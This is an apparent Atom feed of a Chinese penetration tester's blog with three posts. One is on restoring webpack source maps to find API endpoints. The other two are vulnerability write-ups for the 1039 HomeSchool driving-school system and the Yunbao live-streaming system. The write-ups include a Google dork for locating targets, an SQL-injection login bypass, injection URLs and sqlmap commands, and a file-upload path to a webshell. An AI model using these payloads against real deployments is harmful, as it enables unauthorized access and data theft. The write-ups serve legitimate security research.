Jekyll2021-02-22T22:12:32+08:00https://p1kaju.github.io//feed.xmlA-Team@P1Kaju’s blog分享我偶尔发现的新鲜与乐趣! 🏄朋与厌PopXP1Kaju@163.comSourceMap还原前端代码2020-11-26T22:00:10+08:002020-11-26T22:00:10+08:00https://p1kaju.github.io//javascript/restore-source-map<p>最近做渗透测试过程中, 遇到了非常多Webpack的目标站. 通过还原前端代码找到API端点,从而得到未授权访问漏洞。</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557500.png" alt="img" /></p>
<p>在通过HTML源代码中的js找接口的时候发现可以通过浏览器调试功能的源代码处能够直接看到前端Vue具体的代码。</p>
<p><img src="https://i.loli.net/2020/11/27/6wtcbjfdYCxv2ul.png" alt="image.png" /></p>
<p>然后再网上查了查,找到一个工具(restore-source-tree)可以直接通过SourceMap 将前端代码还原到本地。</p>
<h2 id="0x01--安装-restore-source-tree">0x01 安装 restore-source-tree</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/laysent/restore-source-tree.git
<span class="nb">cd </span>restore-source-tree
npm i <span class="nt">-g</span> restore-source-tree
</code></pre></div></div>
<h2 id="0x02--还原代码">0x02 还原代码</h2>
<p>找个能访问的页面按Ctrl+U 查看源代码,再随便打开一个js找到映射文件。</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-15905575011.png" alt="img" /></p>
<p>通常我们要找到的SourceMap 映射文件都在这些文件的最下面有个注释的地方。</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557505.png" alt="img" /></p>
<p>把这 <em>chunk-vendors.6b92c4bd.js.map</em> 拼接到当前url目录就能把这个Source Map 文件下载下来了</p>
<h3 id="使用-restore-source-tree-开始还原代码">使用 restore-source-tree 开始还原代码</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>restore-source-tree chunk-vendors.6b92c4bd.js.map
chunk-vendors.6b92c4bd.js.map 就是我们刚才拼接的文件
<span class="c"># -o 参数是输出目录,默认为当前目录output文件夹</span>
</code></pre></div></div>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557507.png" alt="img" /></p>
<p>最终生成的文件会存放在<code class="language-plaintext highlighter-rouge">./output</code>目录</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557508.png" alt="img" /></p>
<h2 id="reference">Reference</h2>
<p>https://gh0st.cn/archives/2020-01-08/2</p>
<p>https://laysent.com/til/2019-05-03_restore-source-map</p>朋与厌PopXP1Kaju@163.com最近做渗透测试过程中, 遇到了非常多Webpack的目标站. 通过还原前端代码找到API端点,从而得到未授权访问漏洞。1039 HomeSchool security research2019-09-14T21:00:10+08:002019-09-14T21:00:10+08:00https://p1kaju.github.io//research/1039-HomeSchool-security-research<p>1039家校通网上约车系统是一款驾校一体化系统。</p>
<p>北京壹零叁玖科技发展有限公司(简称1039公司)是国内第一家专业从事培训行业标准化软件开发和大型应用性平台的高科技企业,是培训行业信息化建设的最佳合作伙伴。</p>
<p>Google Hack:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>intitle: 1039家校通
</code></pre></div></div>
<p><img src="https://i.loli.net/2019/10/26/fDzCsTPXkBGAipO.png" alt="image.png" /></p>
<h2 id="漏洞利用">漏洞利用</h2>
<h3 id="sql注入万能密码">SQL注入万能密码</h3>
<p>影响版本: 家校通v1.0 - v.6.0</p>
<p>登录接口</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/admin/Product/Comstye.aspx
/Student/StudentLogin.aspx
/Teacher/Index.aspx
</code></pre></div></div>
<p><strong>管理员</strong></p>
<p>用户名密码均输入: ‘ or ‘’=’ (都是单引号)可直接进入。</p>
<p><img src="https://i.loli.net/2019/09/01/8gQHWsE7Xihzofn.png" alt="1567317867435.png" /></p>
<p>登陆后可任意修改网站内容</p>
<p><img src="https://i.loli.net/2019/09/01/S8bAOypRX9K2TG1.png" alt="1567318261894.png" /></p>
<h3 id="教练点评处存在sql注入">教练点评处存在SQL注入</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/Teacher/TeacherPf.aspx?yid=0030
</code></pre></div></div>
<p><img src="https://i.loli.net/2019/09/01/W8MS7TAhqfuHXD1.png" alt="1567322657154.png" /></p>
<p><img src="https://i.loli.net/2019/09/01/ldhsSJpK5X7bziy.png" alt="1567328906324.png" /></p>
<h3 id="管理员后台增加分类处存在sql注入">管理员后台增加分类处存在SQL注入</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/admin/Product/comstye2.aspx
/admin/yk/Index.aspx
</code></pre></div></div>
<p>配合SQL万能密码进入后台,然后访问:</p>
<p><img src="https://i.loli.net/2019/09/01/oG5yqL6KBlvu42C.png" alt="1567321823408.png" /></p>
<p><img src="https://i.loli.net/2019/09/01/QzeC7uNBLPRF1oh.png" alt="1567321705586.png" /></p>
<h3 id="后台管理编辑器任意文件上传">后台管理编辑器任意文件上传</h3>
<p>上传文件</p>
<p><img src="https://i.loli.net/2019/09/01/aXg3nAxYFQ2EIhr.png" alt="1567329246720.png" /></p>
<p>Burp抓包重放数据 模块,可以看到上传的地址;</p>
<p><img src="https://i.loli.net/2019/09/01/z9qTfBHeNMShjAI.png" alt="1567329315435.png" /></p>
<p>访问路径 就是大马的地址
<img src="https://i.loli.net/2019/09/01/YxanmheG8trgodQ.png" alt="image.png" /></p>
<p><strong>WOW GETSHELL!</strong>
<img src="https://i.loli.net/2019/09/01/fbsNvJuHaGD7YwU.png" alt="image.png" /></p>朋与厌PopXP1Kaju@163.com1039家校通网上约车系统是一款驾校一体化系统。[代码审计] 云豹科技直播系统2019-07-09T09:06:01+08:002019-07-09T09:06:01+08:00https://p1kaju.github.io//research/yunbaocms-security-research<p>分享一下云豹科技直播系统的2处前台注入漏洞,<a href="http://www.yunbaokj.com/">云豹直播系统</a> 采用ThinkCMF框架二次开发。</p>
<h2 id="videocontrollerclassphp">VideoController.class.php</h2>
<p>文件地址: /application/Appapi/Controller/VideoController.class.php:17</p>
<p><img src="https://i.loli.net/2021/02/22/d5UWQPF2rMEKvVZ.png" alt="image.png" /></p>
<p>代码中17行直接将videoid参数传入SQL执行器查询,导致了报错注入漏洞。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>漏洞地址: http://localhost.com/index.php?g=Appapi&m=Video&videoid=1%27
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/WPoc6Ihz9CfNnay.png" alt="image.png" /></p>
<p>程序执行的SQL语句如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ SQL语句 ] : SELECT * FROM `cmf_users_video` WHERE ( id=1' ) LIMIT 1
</code></pre></div></div>
<p>利用SQLMAP工具输出漏洞,需要闭合前缀括号<code class="language-plaintext highlighter-rouge">1) and 1=1 --+</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>验证漏洞:http://localhost.com/index.php?g=Appapi&m=Video&videoid=1)%20and%201=1%20--+
SQLMAP参数: sqlmap -u http://localhost.com/index.php?g=Appapi&m=Video&videoid=1* –prefix "1)"
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/NTlKUJR5voYILZg.png" alt="image.png" /></p>
<h2 id="playbackcontrollerclassphp">PlaybackController.class.php</h2>
<p>文件地址:/application/Home/Controller/PlaybackController.class.php:14</p>
<p><img src="https://i.loli.net/2021/02/22/FeP4EKdYT39O2nw.png" alt="image.png" /></p>
<p>代码14行将传入的touid参数未任何过滤参数直接拼接到SQL执行器。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>漏洞地址:http://localhost.com/index.php?g=Home&m=Playback&touid=1%20AND%20GTID_SUBSET(CONCAT(md5(1340914307)),11)
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/QGdZtV9TnF7pfbI.png" alt="image.png" /></p>
<p>程序SQL执行语句如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ SQL语句 ] : SELECT * FROM `cmf_users_liverecord` WHERE ( uid=1 AND GTID_SUBSET(CONCAT(md5(1340914307)),11) )
</code></pre></div></div>
<p>利用SQLMAP工具输出漏洞参数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlmap -u "http://localhost.com/index.php?g=Home&m=Playback&touid=1*" --current-user
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/eulaziMQy31WnDd.png" alt="image.png" /></p>朋与厌PopXP1Kaju@163.com分享一下云豹科技直播系统的2处前台注入漏洞,云豹直播系统 采用ThinkCMF框架二次开发。